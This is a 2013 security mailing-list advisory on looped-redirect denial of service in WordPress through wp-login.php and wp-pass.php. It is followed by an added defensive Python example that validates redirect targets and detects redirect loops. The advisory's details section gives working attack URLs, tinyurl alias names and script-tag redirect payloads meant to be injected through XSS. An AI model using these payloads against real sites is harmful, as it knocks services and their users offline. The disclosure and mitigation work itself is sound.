Open Source and information security mailing list archives
Message-ID: <008601ce735b$c1578680$9b7a6fd5@pc>
Date: Thu, 27 Jun 2013 20:28:00 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Denial of Service in WordPress

Hello list!

These are Denial of Service vulnerabilities in WordPress, which I disclosed 
two days ago (http://websecurity.com.ua/6600/).

I wrote last year about the XSS vulnerabilities in WordPress, which exist in 
two redirectors (http://seclists.org/fulldisclosure/2012/Mar/343). I already 
wrote about the Redirector vulnerabilities in these WP scripts in 2007 (and 
made patches for them). The developers fixed the redirectors in WP 2.3, so 
Redirector and XSS attacks are possible only in earlier versions.

As I have recently checked, this functionality can be used for conducting DoS 
attacks, i.e. to create Looped DoS vulnerabilities from the two redirectors 
(according to the Classification of DoS vulnerabilities in web applications 
(http://websecurity.com.ua/2663/)) by combining a web site on WordPress with 
a redirecting service or another site. This attack is similar to the looping 
of two redirectors described in my articles Redirectors' hell and Hellfire for 
redirectors. Interestingly, the looped redirector 
(http://tinyurl.com/hellfire-url), which I made on 5 February 2009 for my 
article Hellfire for redirectors, is still working.

-------------------------
Affected products:
-------------------------

All versions of WordPress are vulnerable: for the easy attack, WP 2.2.3 and 
earlier versions; for the harder attack, WP 3.5.2 and earlier versions. The 
second variant of the attack requires a Redirector or XSS vulnerability on 
the same domain as the web site on WP.

----------
Details:
----------

Denial of Service (WASC-10):

A Custom alias must be created at tinyurl.com or another redirector service, 
which leads to wp-login.php or wp-pass.php with the alias set as the 
redirection target.

http://site/wp-login.php?action=logout&redirect_to=http://tinyurl.com/loopeddos1

http://site/wp-pass.php?_wp_http_referer=http://tinyurl.com/loopeddos2

Here are examples of these vulnerabilities:

http://tinyurl.com/loopeddos1

http://tinyurl.com/loopeddos2

This attack will work for WordPress < 2.3. Note that Mozilla, Firefox, Chrome 
and Opera will stop the endless redirect after a series of requests, unlike IE.

To make this attack work in all versions of the engine, including WordPress 
3.5.2, the redirector must be on the same domain as the web site on WP. For 
this, any vulnerability can be used, e.g. reflected XSS or persistent XSS (on 
the same domain), to include a script that redirects to one of these 
redirectors:

WordPress_Looped_DoS.html

<script>document.location="http://site/wp-login.php?action=logout&redirect_to=http://site/WordPress_Looped_DoS.html"</script>

WordPress_Looped_DoS-2.html

<script>document.location="http://site/wp-pass.php"</script>

This attack will work in WordPress 3.5.2 and earlier versions, as it is not 
stopped by the browsers (endless redirect).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
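
As an added defensive example (not part of MustLive's post and not WordPress's own code), the Python below shows the two mitigations this advisory points at: validating a redirect target against the site's own host, the kind of check WP 2.3 introduced for these scripts, and following a redirect chain with a visited set and a hop cap, which is what stops the loop in the browsers the post names. The host `site`, the `/wp-admin/` fallback, the `wp-login.php` handler and the short-link alias are constructed stand-ins resolved in memory, not live requests.

```python
from urllib.parse import urlparse, parse_qs

ALLOWED_HOSTS = {"site"}                  # constructed: the site's own host only
DEFAULT_TARGET = "http://site/wp-admin/"  # fallback when redirect_to is rejected

def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True if target is a local path or an http(s) URL on an allowed host.
    Protocol-relative ('//host') and backslash forms are rejected outright."""
    t = target.strip()
    if t.startswith(("//", "/\\", "\\")):
        return False
    p = urlparse(t)
    if p.scheme and p.scheme not in ("http", "https"):
        return False                      # javascript:, data:, ...
    if not p.netloc:
        return True                       # plain local path such as /wp-admin/
    return p.hostname in allowed_hosts

def make_resolver(validate):
    """Constructed stand-in for the advisory's two parties: a wp-login.php that
    honours redirect_to (unchecked when validate=False, as before WP 2.3) and a
    short-link alias pointing back at it. Returns the next Location or None."""
    def resolve(url):
        p = urlparse(url)
        if p.hostname == "site" and p.path == "/wp-login.php":
            target = parse_qs(p.query).get("redirect_to", [DEFAULT_TARGET])[0]
            return DEFAULT_TARGET if validate and not is_safe_redirect(target) else target
        if p.hostname == "tinyurl.com" and p.path == "/loopeddos1":
            return ("http://site/wp-login.php?action=logout"
                    "&redirect_to=http://tinyurl.com/loopeddos1")
        return None                       # any other URL is a final page
    return resolve

def follow_redirects(start, resolve, max_hops=10):
    """Follow Location hops, refusing to revisit a URL or to exceed max_hops.
    Returns (last_url, hops, reason), reason in {'done', 'loop', 'max_hops'}."""
    seen, url, hops = set(), start, 0
    while True:
        if url in seen:
            return url, hops, "loop"
        seen.add(url)
        nxt = resolve(url)
        if nxt is None:
            return url, hops, "done"
        if hops == max_hops:
            return url, hops, "max_hops"
        url, hops = nxt, hops + 1
```

With `validate=False` the chain returns to its starting URL after two hops and is reported as a loop; with `validate=True` the external alias is rejected and the client lands on the local fallback after one hop.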

